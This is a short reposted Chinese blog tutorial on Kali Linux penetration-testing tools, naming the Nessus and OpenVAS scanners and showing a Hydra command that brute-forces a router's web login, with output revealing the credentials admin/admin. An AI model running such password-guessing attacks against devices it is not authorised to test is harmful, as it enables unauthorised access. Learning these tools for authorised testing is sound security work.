碼上快樂

相關內容    簡體    繁體

Kali linux滲透測試常用工具匯總2-滲透攻擊

本文轉載自   查看原文   2015-08-09 22:37   5614 

滲透攻擊的思路一般是掃描漏洞,然后利用不同的漏洞,才有針對的滲透攻擊。

 

漏洞掃描的工具有Nessus,該工具可同時在本地或遠端遙控,對系統的漏洞分析掃描。Nessus通過新建掃描策略,並添加對應的插件,便可以對系統漏洞進行掃描。

另一個漏洞掃描工具是OpenVAS,在這里不做說明。

 

上面說明漏洞掃描,下面說下滲透攻擊常用的工具Hydra和Medusa。

舉個破解路由器登錄密碼的例子。

root@alexknight:~# hydra  -l admin -P /tmp/tt.txt -f -V -e nsr -s 80 -t 1  192.168.1.1 http-get
Hydra v7.5 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2015-08-09 22:19:37
[WARNING] You must supply the web page as an additional option or via -m, default path set to /
[DATA] 1 task, 1 server, 7 login tries (l:1/p:7), ~7 tries per task
[DATA] attacking service http-get on port 80
[ATTEMPT] target 192.168.1.1 - login "admin" - pass "admin" - 1 of 7 [child 0]
[80][www] host: 192.168.1.1   login: admin   password: admin
[STATUS] attack finished for 192.168.1.1 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2015-08-09 22:19:38

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 Kali linux滲透測試常用工具匯總1 Linux測試硬盤讀性能的常用工具-hdparm 接口測試及常用工具 APP測試常用工具以及框架 常用工具集合 Linux下深度學習常用工具的安裝 dns隧道攻擊原理及常用工具流量分析 C#(Net)軟件開發常用工具匯總,提高你的開發效率 全球參考系統(WRS)概述及常用工具匯總 Android 開發常用工具合集
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM